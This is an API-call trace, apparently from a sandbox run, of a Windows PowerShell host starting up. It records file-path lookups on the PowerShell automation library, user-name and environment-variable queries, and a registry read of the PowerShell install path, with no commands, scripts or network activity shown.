	[0222.305] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.305] SetErrorMode (uMode=0x1) returned 0x1
	[0222.305] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.305] SetErrorMode (uMode=0x1) returned 0x1
	[0222.305] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x17d490 | out: lpFileInformation=0x17d490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.305] SetErrorMode (uMode=0x1) returned 0x1
	[0222.306] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.306] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x17d180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.315] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x17d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.315] SetErrorMode (uMode=0x1) returned 0x1
	[0222.315] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x17d750 | out: lpFileInformation=0x17d750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.315] SetErrorMode (uMode=0x1) returned 0x1
	[0223.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0223.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0223.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0223.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.220] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0228.220] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17dab8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17dab8) returned 0x1
	[0228.818] CoTaskMemFree (pv=0x1b7df860) 
	[0228.820] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0228.821] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17daf8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17daf8) returned 1
	[0228.829] CoTaskMemFree (pv=0x3e8150) 
	[0228.831] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d71b98*="Available", lpRawData=0x2d71928) returned 1
	[0229.041] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0229.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.042] CoTaskMemFree (pv=0x42df80) 
	[0229.043] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0229.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.043] CoTaskMemFree (pv=0x42df80) 
	[0229.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.049] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0229.049] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0229.049] CoTaskMemFree (pv=0x42df80) 
	[0229.049] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0229.049] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0229.049] CoTaskMemFree (pv=0x42df80) 
	[0229.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.051] GetCurrentProcessId () returned 0xce0
	[0229.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.070] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x17dad8 | out: phkResult=0x17dad8*=0x158) returned 0x0
	[0229.070] RegQueryValueExW (in: hKey=0x158, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17da5c, lpData=0x0, lpcbData=0x17da58*=0x0 | out: lpType=0x17da5c*=0x1, lpData=0x0, lpcbData=0x17da58*=0x56) returned 0x0
	[0229.070] CoTaskMemAlloc (cb=0x5a) returned 0x1b7be610
	[0229.070] RegQueryValueExW (in: hKey=0x158, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17da2c, lpData=0x1b7be610, lpcbData=0x17da28*=0x56 | out: lpType=0x17da2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x17da28*=0x56) returned 0x0
	[0229.071] RegCloseKey (hKey=0x158) returned 0x0
	[0229.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.087] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0229.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
